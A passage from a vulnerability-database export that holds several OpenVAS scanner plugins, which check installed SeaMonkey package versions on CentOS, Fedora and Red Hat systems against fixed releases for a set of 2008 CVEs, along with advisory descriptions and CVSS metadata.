isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:56:36", "references": ["https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01403.html", "2008-8429"], "pluginID": "860814", "description": "Check for the Version of seamonkey", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-02-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "Fedora Update for seamonkey FEDORA-2008-8429", "type": "openvas", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=860814", "id": "OPENVAS:860814", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for seamonkey FEDORA-2008-8429\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"seamonkey on Fedora 9\";\ntag_insight = \"SeaMonkey is an all-in-one Internet application suite. It includes\n a browser, mail/news client, IRC client, JavaScript debugger, and\n a tool to inspect the DOM for web pages. It is derived from the\n application formerly known as Mozilla Application Suite.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-September/msg01403.html\");\n script_id(860814);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:05:11 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2008-8429\");\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-3835\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\", \"CVE-2008-3837\", \"CVE-2008-4065\", \"CVE-2008-4066\");\n script_name( \"Fedora Update for seamonkey FEDORA-2008-8429\");\n\n script_summary(\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC9\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.1.12~1.fc9\", rls:\"FC9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:41:43", "references": ["2008:0882-01", "http://lists.centos.org/pipermail/centos-announce/2008-September/015270.html"], "pluginID": "1361412562310880241", "description": "Check for the Version of seamonkey", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-02-27T00:00:00", "type": "openvas", "title": "CentOS Update for seamonkey CESA-2008:0882-01 centos2 i386", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880241", "id": "OPENVAS:1361412562310880241", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2008:0882-01 centos2 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SeaMonkey is an open source Web browser, advanced email and newsgroup\n client, IRC chat client, and HTML editor.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code as the user running SeaMonkey.\n (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,\n CVE-2008-4062)\n \n Several flaws were found in the way malformed web content was displayed. A\n web page containing specially crafted content could potentially trick a\n SeaMonkey user into surrendering sensitive information. (CVE-2008-3835,\n CVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n \n A flaw was found in the way SeaMonkey handles mouse click events. A web page\n containing specially crafted JavaScript code could move the content window\n while a mouse-button was pressed, causing any item under the pointer to be\n dragged. This could, potentially, cause the user to perform an unsafe\n drag-and-drop action. (CVE-2008-3837)\n \n A flaw was found in SeaMonkey that caused certain characters to be stripped\n from JavaScript code. This flaw could allow malicious JavaScript to bypass\n or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n \n All SeaMonkey users should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"seamonkey on CentOS 2\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-September/015270.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880241\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0882-01\");\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n script_name( \"CentOS Update for seamonkey CESA-2008:0882-01 centos2 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS2\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.20.el2.c2.1\", rls:\"CentOS2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:39:15", "references": ["2008:0882", "http://lists.centos.org/pipermail/centos-announce/2008-September/015268.html"], "pluginID": "1361412562310880265", "description": "Check for the Version of seamonkey", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-02-27T00:00:00", "type": "openvas", "title": "CentOS Update for seamonkey CESA-2008:0882 centos3 i386", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880265", "id": "OPENVAS:1361412562310880265", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for seamonkey CESA-2008:0882 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SeaMonkey is an open source Web browser, advanced email and newsgroup\n client, IRC chat client, and HTML editor.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code as the user running SeaMonkey.\n (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,\n CVE-2008-4062)\n \n Several flaws were found in the way malformed web content was displayed. A\n web page containing specially crafted content could potentially trick a\n SeaMonkey user into surrendering sensitive information. (CVE-2008-3835,\n CVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n \n A flaw was found in the way SeaMonkey handles mouse click events. A web page\n containing specially crafted JavaScript code could move the content window\n while a mouse-button was pressed, causing any item under the pointer to be\n dragged. This could, potentially, cause the user to perform an unsafe\n drag-and-drop action. (CVE-2008-3837)\n \n A flaw was found in SeaMonkey that caused certain characters to be stripped\n from JavaScript code. This flaw could allow malicious JavaScript to bypass\n or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n \n All SeaMonkey users should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"seamonkey on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-September/015268.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880265\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2008:0882\");\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n script_name( \"CentOS Update for seamonkey CESA-2008:0882 centos3 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.24.el3.centos3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-09T11:40:57", "references": ["https://www.redhat.com/archives/rhsa-announce/2008-September/msg00012.html", "2008:0882-01"], "pluginID": "1361412562310870142", "description": "Check for the Version of seamonkey", "edition": 2, "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "published": "2009-03-06T00:00:00", "title": "RedHat Update for seamonkey RHSA-2008:0882-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870142", "id": "OPENVAS:1361412562310870142", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for seamonkey RHSA-2008:0882-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"SeaMonkey is an open source Web browser, advanced email and newsgroup\n client, IRC chat client, and HTML editor.\n\n Several flaws were found in the processing of malformed web content. A web\n page containing malicious content could cause SeaMonkey to crash or,\n potentially, execute arbitrary code as the user running SeaMonkey.\n (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,\n CVE-2008-4062)\n \n Several flaws were found in the way malformed web content was displayed. A\n web page containing specially crafted content could potentially trick a\n SeaMonkey user into surrendering sensitive information. (CVE-2008-3835,\n CVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n \n A flaw was found in the way SeaMonkey handles mouse click events. A web page\n containing specially crafted JavaScript code could move the content window\n while a mouse-button was pressed, causing any item under the pointer to be\n dragged. This could, potentially, cause the user to perform an unsafe\n drag-and-drop action. (CVE-2008-3837)\n \n A flaw was found in SeaMonkey that caused certain characters to be stripped\n from JavaScript code. This flaw could allow malicious JavaScript to bypass\n or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n \n All SeaMonkey users should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"seamonkey on Red Hat Enterprise Linux AS (Advanced Server) version 2.1,\n Red Hat Enterprise Linux ES version 2.1,\n Red Hat Enterprise Linux WS version 2.1,\n Red Hat Enterprise Linux AS version 3,\n Red Hat Enterprise Linux ES version 3,\n Red Hat Enterprise Linux WS version 3,\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2008-September/msg00012.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870142\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-06 07:30:35 +0100 (Fri, 06 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2008:0882-01\");\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n script_name( \"RedHat Update for seamonkey RHSA-2008:0882-01\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_2.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-devel\", rpm:\"seamonkey-devel~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-js-debugger\", rpm:\"seamonkey-js-debugger~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-mail\", rpm:\"seamonkey-mail~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr\", rpm:\"seamonkey-nspr~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nspr-devel\", rpm:\"seamonkey-nspr-devel~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss\", rpm:\"seamonkey-nss~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-nss-devel\", rpm:\"seamonkey-nss-devel~1.0.9~0.20.el2\", rls:\"RHENT_2.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_4\")\n{\n\n if ((res = isrpmvuln(pkg:\"devhelp\", rpm:\"devhelp~0.10~0.10.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"devhelp-debuginfo\", rpm:\"devhelp-debuginfo~0.10~0.10.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"devhelp-devel\", rpm:\"devhelp-devel~0.10~0.10.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~1.0.9~26.el4\", rls:\"RHENT_4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-chat\", rpm:\"seamonkey-chat~1.0.9~26.el4\", 